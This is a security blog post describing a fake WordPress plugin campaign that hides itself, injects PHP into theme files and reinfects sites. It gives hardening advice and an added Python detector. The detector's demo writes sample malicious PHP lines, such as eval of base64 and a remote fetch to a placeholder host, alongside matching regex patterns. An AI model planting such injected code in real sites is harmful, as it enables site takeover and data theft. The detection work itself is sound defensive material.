
Booby trap in disguise: How a fake WordPress plugin hands over admin access to attackers

  • Javier Conejo del Cerro
  • 9 hours ago
  • 3 min read


In the vast ecosystem of WordPress, security is often treated as a plugin away. But when attackers mimic security itself, that assumption becomes a gateway to disaster.

A new campaign has been uncovered in which a malicious plugin, masquerading as a security enhancement, stealthily installs backdoors, hijacks admin control, and turns WordPress sites into vehicles for ad fraud, data theft, and persistent reinfection.


When security becomes the threat


At the heart of this campaign is a fake plugin named WP-antymalwary-bot.php. Other variants have surfaced under names like addons.php, wpconsole.php, and scr.php—all cleverly disguised to blend in with legitimate plugins.

Once installed, this plugin performs multiple malicious functions:

  • It hides itself from the WordPress admin dashboard.

  • It injects malicious PHP via the REST API into theme files.

  • It downloads additional payloads hosted on attacker-controlled infrastructure.

  • It reinfects the site using a companion file (wp-cron.php) that auto-executes on the next visit.

In essence, it’s a booby trap with a user-friendly face—one click and your entire site can be owned.


Who’s at risk?


This campaign targets a broad range of WordPress installations:

  • E-commerce platforms are particularly attractive for their payment data and customer credentials.

  • High-traffic blogs provide ad revenue potential.

  • Small and medium businesses, often lacking continuous monitoring or updates, are low-hanging fruit.

Victims are seeing their admin dashboards hijacked, ads injected without consent, payment data skimmed, and server resources drained to power attackers’ monetization schemes.

Even if the malicious plugin is removed, the threat doesn’t go away. A wp-cron.php backdoor is quietly reactivated the moment someone visits the site again.


The breach method: A double-edged approach


This isn’t just a one-trick pony. Alongside the fake plugin, the attackers deploy a multi-stage backdoor via fake CAPTCHA prompts. Once clicked, these deceptively familiar popups trigger downloads of Node.js-based remote access trojans (RATs).

These RATs:

  • Steal browser and session data.

  • Use SOCKS5 proxies to tunnel malicious traffic.

  • Execute commands remotely and persist across sessions.

  • Are tied to a Traffic Distribution System (TDS) known as Kongtuke, also tracked under names like LandUpdate808 and 404 TDS.

This approach combines plugin-level persistence with client-side deception, creating a layered infection that’s hard to detect and harder to remove.


The technical anatomy


  • REST API exploitation: Attackers leverage REST endpoints to insert PHP into the site theme’s header.php file.

  • Payload fetching: JavaScript ads and malware are retrieved from other compromised sites.

  • Reinfection: If the plugin is removed, the cron job file ensures the infection returns on the next visit.

  • Ad injection: Google AdSense scripts are embedded to generate fraudulent impressions and clicks, sometimes stealing legitimate revenue.

  • Fake updates: Some variants redirect users to fake browser update pages, triggering additional infections via MintsLoader or similar droppers.


The bigger picture: web skimming and beyond


This plugin campaign isn’t isolated. It’s part of a broader trend of web skimming and e-skimming, where attackers aim to steal credit card details, login credentials, cookies, and more. In some cases, attackers disguise their data exfiltration using:

  • Fake GIF images that are actually PHP reverse proxies.

  • Local session storage abuse.

  • Malicious proxies to reroute checkout data.

Together, these techniques illustrate a mature and multifaceted threat landscape focused on one thing: monetizing your WordPress environment behind your back.


How to protect your site


Here’s how to stay ahead of this increasingly sophisticated threat:

  1. Audit Plugins Regularly. Delete any unused or suspicious ones—especially if they don’t come from trusted sources.

  2. Harden REST API Access. Disable unused endpoints and monitor for unauthorized interactions.

  3. Inspect for wp-cron.php Manipulation. Any unexpected or repetitive cron behavior could signal reinfection.

  4. Block Outbound Requests to Unknown Domains, especially those serving scripts or redirecting traffic.

  5. Review Theme and Core Files. Check header.php, footer.php, and functions files for hidden code injections.

  6. Train Teams on Fake CAPTCHA Risks. Ensure users know that unexpected popups—especially those mimicking CAPTCHA—should be treated with suspicion.

  7. Use File Integrity Monitoring. Automated systems can alert you to unauthorized file modifications.

  8. Implement WAFs and Rate Limiting to slow down automated attempts to reinfect or exploit your platform.
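One way to put steps 3, 5 and 7 (wp-cron.php inspection, theme-file review and file integrity monitoring) into practice, and to flag the behaviours listed under "The technical anatomy" (self-hiding plugin, PHP injected into header.php, a reinfection file that fetches remote payloads). This is an added Python example, not code from the original post or from any product; the file globs, the regex heuristics and the sample site it builds in a temporary directory are all constructed for illustration.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Hypothetical heuristics for the behaviours the post describes; constructed, not indicators from the post.
SUSPICIOUS = {
    "hides itself from the plugin list": re.compile(r"add_filter\(\s*['\"]all_plugins['\"]"),
    "obfuscated code execution": re.compile(r"\b(eval|assert)\s*\(\s*(base64_decode|gzinflate|str_rot13)\b"),
    "fetches remote payload": re.compile(r"\b(file_get_contents|curl_init)\s*\(\s*['\"]https?://"),
}
# Files the post singles out: the reinfection file, theme header/footer/functions and plugin entry points.
WATCHED = ("wp-cron.php", "wp-content/themes/*/header.php", "wp-content/themes/*/footer.php",
           "wp-content/themes/*/functions.php", "wp-content/plugins/*.php", "wp-content/plugins/*/*.php")

def _watched(root: Path):
    for pattern in WATCHED:
        yield from sorted(root.glob(pattern))

def snapshot(root: Path) -> dict:
    """Baseline: relative path -> SHA-256, taken while the site is known to be clean."""
    return {str(p.relative_to(root)): hashlib.sha256(p.read_bytes()).hexdigest() for p in _watched(root)}

def audit(root: Path, baseline: dict) -> list:
    """Return (path, reason) findings: integrity drift against the baseline plus content heuristics."""
    findings = []
    current = snapshot(root)
    for rel, digest in current.items():
        if rel not in baseline:
            findings.append((rel, "new file not in baseline"))
        elif baseline[rel] != digest:
            findings.append((rel, "content changed since baseline"))
        text = (root / rel).read_text(errors="ignore")
        for reason, rx in SUSPICIOUS.items():
            if rx.search(text):
                findings.append((rel, reason))
    for rel in baseline.keys() - current.keys():
        findings.append((rel, "baseline file missing"))
    return findings

def run_demo() -> list:
    """Constructed site: clean baseline, then the kinds of change the post describes."""
    root = Path(tempfile.mkdtemp())
    theme, plugins = root / "wp-content/themes/demo", root / "wp-content/plugins"
    theme.mkdir(parents=True); plugins.mkdir(parents=True)
    (theme / "header.php").write_text("<?php wp_head(); ?>\n")
    (plugins / "hello.php").write_text("<?php // legitimate plugin\n")
    baseline = snapshot(root)
    (theme / "header.php").write_text("<?php wp_head(); eval(base64_decode('...')); ?>\n")  # injected PHP
    (plugins / "fake-security.php").write_text("<?php add_filter('all_plugins', 'hide_me');\n")  # self-hiding
    (root / "wp-cron.php").write_text("<?php file_get_contents('https://example.invalid/p');\n")  # reinfection
    return audit(root, baseline)

if __name__ == "__main__":
    for path, reason in run_demo():
        print(f"{path}: {reason}")
```

On a real install, take the baseline from a fresh deploy and run `audit` from a cron job or CI step, so that drift in wp-cron.php or header.php is reported before the next visitor triggers the reinfection.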


The irony of this campaign is cruel: the very concept of a security plugin becomes the vector for compromise. But the lesson is clear—blind trust in surface-level security can be exploited, especially on platforms as widely used as WordPress.

Administrators and developers need to treat plugins with the same scrutiny as any third-party code. If it promises to “optimize” or “secure” your site, and you didn’t specifically install it from a trusted vendor, it may be doing the opposite.

Trust cautiously. Monitor frequently. And above all, audit relentlessly.


